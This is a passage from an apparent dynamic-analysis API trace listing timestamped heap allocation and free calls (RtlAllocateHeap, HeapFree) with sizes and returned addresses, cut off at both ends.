0x4ee170 [0138.725] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4eaf10 | out: hHeap=0x4d0000) returned 1 [0138.725] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4ed810 | out: hHeap=0x4d0000) returned 1 [0138.725] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x2377) returned 0x51d910 [0138.725] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x11d7) returned 0x4f1ed0 [0138.725] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x8e0) returned 0x4e93b0 [0138.726] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x51d910 | out: hHeap=0x4d0000) returned 1 [0138.726] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4f1ed0 | out: hHeap=0x4d0000) returned 1 [0138.726] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4e93b0 | out: hHeap=0x4d0000) returned 1 [0138.726] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x5b0) returned 0x4e88e0 [0138.726] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4e88e0 | out: hHeap=0x4d0000) returned 1 [0138.726] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x640) returned 0x4e88e0 [0138.726] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x5be2) returned 0x4fdb10 [0138.731] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4ee170 | out: hHeap=0x4d0000) returned 1 [0138.732] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4e88e0 | out: hHeap=0x4d0000) returned 1 [0138.732] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x890) returned 0x51d910 [0138.732] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x51d910 | out: hHeap=0x4d0000) returned 1 [0138.732] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0xac0) returned 0x51d910 [0138.732] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x51d910 | out: hHeap=0x4d0000) returned 1 [0138.732] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x4db890 [0138.732] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x960) returned 0x51d910 [0138.732] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x960) returned 0x51e280 [0138.732] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x51d910 | out: hHeap=0x4d0000) returned 1 [0138.732] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x460) returned 0x4e88e0 [0138.732] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0xe0f) returned 0x51ebf0 [0138.732] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x51e280 | out: hHeap=0x4d0000) returned 1 [0138.732] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4e88e0 | out: hHeap=0x4d0000) returned 1 [0138.732] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x1c17) returned 0x503700 [0138.732] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0xe00) returned 0x51d910 [0138.732] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x700) returned 0x505320 [0138.733] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x503700 | out: hHeap=0x4d0000) returned 1 [0138.733] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x51d910 | out: hHeap=0x4d0000) returned 1 [0138.733] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x153d) returned 0x503700 [0138.733] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x51ebf0 | out: hHeap=0x4d0000) returned 1 [0138.733] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x505320 | out: hHeap=0x4d0000) returned 1 [0138.733] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x2277) returned 0x51d910 [0138.733] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x1157) returned 0x504c50 [0138.734] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x8a0) returned 0x505db0 [0138.735] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x51d910 | out: hHeap=0x4d0000) returned 1 [0138.735] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x504c50 | out: hHeap=0x4d0000) returned 1 [0138.735] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x1fc7) returned 0x51d910 [0138.735] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x503700 | out: hHeap=0x4d0000) returned 1 [0138.735] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x505db0 | out: hHeap=0x4d0000) returned 1 [0138.735] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x1657) returned 0x503700 [0138.735] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0xb20) returned 0x504d60 [0138.735] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x590) returned 0x4e88e0 [0138.735] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x503700 | out: hHeap=0x4d0000) returned 1 [0138.735] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x504d60 | out: hHeap=0x4d0000) returned 1 [0138.735] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x2f96) returned 0x503700 [0138.735] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x51d910 | out: hHeap=0x4d0000) returned 1 [0138.735] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4e88e0 | out: hHeap=0x4d0000) returned 1 [0138.736] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x2b47) returned 0x5066a0 [0138.736] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x15b7) returned 0x51d910 [0138.737] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0xad0) returned 0x51eed0 [0138.738] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x5066a0 | out: hHeap=0x4d0000) returned 1 [0138.738] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x51d910 | out: hHeap=0x4d0000) returned 1 [0138.738] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x51eed0 | out: hHeap=0x4d0000) returned 1 [0138.738] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x2697) returned 0x51d910 [0138.738] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x1367) returned 0x5066a0 [0138.738] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x9a0) returned 0x507a10 [0138.738] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x51d910 | out: hHeap=0x4d0000) returned 1 [0138.738] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x5066a0 | out: hHeap=0x4d0000) returned 1 [0138.738] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x474d) returned 0x5083c0 [0138.739] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x503700 | out: hHeap=0x4d0000) returned 1 [0138.739] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x507a10 | out: hHeap=0x4d0000) returned 1 [0138.739] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x920) returned 0x50cb20 [0138.739] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x50cb20 | out: hHeap=0x4d0000) returned 1 [0138.739] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x1b47) returned 0x51d910 [0138.739] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0xd90) returned 0x50cb20 [0138.739] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x6d0) returned 0x51f460 [0138.739] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x51d910 | out: hHeap=0x4d0000) returned 1 [0138.739] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x50cb20 | out: hHeap=0x4d0000) returned 1 [0138.739] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x51f460 | out: hHeap=0x4d0000) returned 1 [0138.739] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x5d0) returned 0x4e88e0 [0138.739] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x6adf) returned 0x4e93b0 [0138.739] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x5083c0 | out: hHeap=0x4d0000) returned 1 [0138.740] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4e88e0 | out: hHeap=0x4d0000) returned 1 [0138.740] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x1887) returned 0x51d910 [0138.740] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0xc30) returned 0x51f1a0 [0138.740] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x620) returned 0x4e88e0 [0138.740] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x51d910 | out: hHeap=0x4d0000) returned 1 [0138.740] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x51f1a0 | out: hHeap=0x4d0000) returned 1 [0138.740] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4e88e0 | out: hHeap=0x4d0000) returned 1 [0138.740] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x8f0) returned 0x51d910 [0138.740] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x480) returned 0x4e88e0 [0138.740] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x240) returned 0x51e210 [0138.740] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x51d910 | out: hHeap=0x4d0000) returned 1 [0138.740] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4e88e0 | out: hHeap=0x4d0000) returned 1 [0138.740] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x51e210 | out: hHeap=0x4d0000) returned 1 [0138.740] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x40) returned 0x4e08d0 [0138.741] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4db890 | out: hHeap=0x4d0000) returned 1 [0138.741] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4fdb10 | out: hHeap=0x4d0000) returned 1 [0138.741] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4e93b0 | out: hHeap=0x4d0000) returned 1 [0138.742] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4e08d0 | out: hHeap=0x4d0000) returned 1 [0138.742] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x9900) returned 0x4e93b0 [0138.742] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x1bf0) returned 0x51d910 [0138.745] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x51d910 | out: hHeap=0x4d0000) returned 1 [0138.745] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x9937) returned 0x4fdb10 [0138.746] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4e93b0 | out: hHeap=0x4d0000) returned 1 [0138.746] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x4db890 [0138.746] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x9900) returned 0x4e93b0 [0138.746] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x1bf0) returned 0x51d910 [0138.747] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x51d910 | out: hHeap=0x4d0000) returned 1 [0138.747] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x9937) returned 0x51d910 [0138.748] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4e93b0 | out: hHeap=0x4d0000) returned 1 [0138.748] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x40) returned 0x4dff20 [0138.748] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4db890 | out: hHeap=0x4d0000) returned 1 [0138.748] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4f3760 | out: hHeap=0x4d0000) returned 1 [0138.749] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x50da10 | out: hHeap=0x4d0000) returned 1 [0138.749] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4e0d80 | out: hHeap=0x4d0000) returned 1 [0138.749] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x4e93b0 [0138.749] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x507450 [0138.749] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x8) returned 0x4d8cd0 [0138.749] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x527250 [0138.750] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x10) returned 0x4e91f0 [0138.750] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4d8cd0 | out: hHeap=0x4d0000) returned 1 [0138.750] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x53a460 [0138.750] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x18) returned 0x4e9190 [0138.751] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4e91f0 | out: hHeap=0x4d0000) returned 1 [0138.751] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x54d670 [0138.751] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x4db590 [0138.751] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4e9190 | out: hHeap=0x4d0000) returned 1 [0138.751] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x560880 [0138.752] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x30) returned 0x4e8420 [0138.752] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4db590 | out: hHeap=0x4d0000) returned 1 [0138.752] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x573a90 [0138.752] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x586ca0 [0138.752] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x48) returned 0x4e0d30 [0138.752] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4e8420 | out: hHeap=0x4d0000) returned 1 [0138.752] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x599eb0 [0138.753] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x5ad0c0 [0138.754] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x1df0080 [0138.754] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x68) returned 0x4d8cd0 [0138.754] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4e0d30 | out: hHeap=0x4d0000) returned 1 [0138.755] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x1e03290 [0138.755] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x1e164a0 [0138.755] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x1e296b0 [0138.756] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x1e3c8c0 [0138.756] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x98) returned 0x4d5080 [0138.756] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4d8cd0 | out: hHeap=0x4d0000) returned 1 [0138.756] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x1e4fad0 [0138.757] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x1e62ce0 [0138.757] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x1e75ef0 [0138.758] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x1e89100 [0138.758] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x1e9c310 [0138.759] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x1eaf520 [0138.759] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0xe0) returned 0x4d8cd0 [0138.759] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4d5080 | out: hHeap=0x4d0000) returned 1 [0138.759] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x1ec2730 [0138.760] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x1ef0080 [0138.761] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x1f03290 [0138.977] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x1f164a0 [0138.978] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x1f296b0 [0138.978] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x1f3c8c0 [0138.979] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x1f4fad0 [0138.979] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x1f62ce0 [0138.980] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x1f75ef0 [0138.980] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x150) returned 0x4db080 [0138.980] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4d8cd0 | out: hHeap=0x4d0000) returned 1 [0138.980] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x1f89100 [0138.981] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x1f9c310 [0138.981] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x1faf520 [0138.982] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x1fc2730 [0138.982] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x1fd5940 [0138.983] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x1fe8b50 [0138.983] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x1ffbd60 [0138.984] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x200ef70 [0138.984] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x2022180 [0138.984] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x2035390 [0138.985] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x20485a0 [0138.985] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x205b7b0 [0138.986] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x206e9c0 [0138.986] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x2081bd0 [0138.986] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x1f8) returned 0x4e88e0 [0138.986] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4db080 | out: hHeap=0x4d0000) returned 1 [0138.986] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x2094de0 [0138.986] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x20a7ff0 [0138.987] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x20bb200 [0138.987] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x20ce410 [0138.988] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x20f0080 [0138.988] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x2103290 [0138.989] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x21164a0 [0138.989] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x21296b0 [0138.990] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x213c8c0 [0138.990] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x214fad0 [0138.990] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x2162ce0 [0138.991] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x2175ef0 [0138.991] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x2189100 [0138.991] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x219c310 [0138.992] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x21af520 [0138.992] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x21c2730 [0138.993] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x21d5940 [0138.993] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x21e8b50 [0138.993] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x21fbd60 [0138.994] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x220ef70 [0138.994] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x2222180 [0138.995] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x2f0) returned 0x4e8ae0 [0138.995] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4e88e0 | out: hHeap=0x4d0000) returned 1 [0138.995] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x2235390 [0138.995] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x22485a0 [0138.996] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x225b7b0 [0138.996] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x226e9c0 [0138.996] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x2281bd0 [0138.996] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x2294de0 [0138.997] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x22a7ff0 [0138.998] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x22bb200 [0138.998] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x22ce410 [0138.998] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x22e1620 [0138.999] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x22f4830 [0138.999] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x2307a40 [0139.000] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x231ac50 [0139.000] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x232de60 [0139.000] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x2341070 [0139.001] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x2354280 [0139.001] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x2367490 [0139.001] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x237a6a0 [0139.002] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x238d8b0 [0139.002] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x23a0ac0 [0139.003] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x23b3cd0 [0139.003] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x23c6ee0 [0139.003] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x23da0f0 [0139.004] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x23ed300 [0139.004] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x2400510 [0139.005] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x2413720 [0139.005] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x2426930 [0139.005] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x2439b40 [0139.006] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x244cd50 [0139.006] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x245ff60 [0139.006] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x2473170 [0139.007] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x468) returned 0x4fc5c0 [0139.007] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4e8ae0 | out: hHeap=0x4d0000) returned 1 [0139.007] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x2486380 [0139.007] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x2499590 [0139.007] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x24ac7a0 [0139.008] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x24bf9b0 [0139.008] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x24d2bc0 [0139.009] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x24f0080 [0139.009] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x2503290 [0139.010] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x25164a0 [0139.010] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x25296b0 [0139.011] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x253c8c0 [0139.011] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x254fad0 [0139.012] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x2562ce0 [0139.224] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x2575ef0 [0139.225] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x2589100 [0139.225] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x259c310 [0139.226] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x25af520 [0139.227] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x25c2730 [0139.227] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x25d5940 [0139.228] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x25e8b50 [0139.228] RtlAllocateHeap 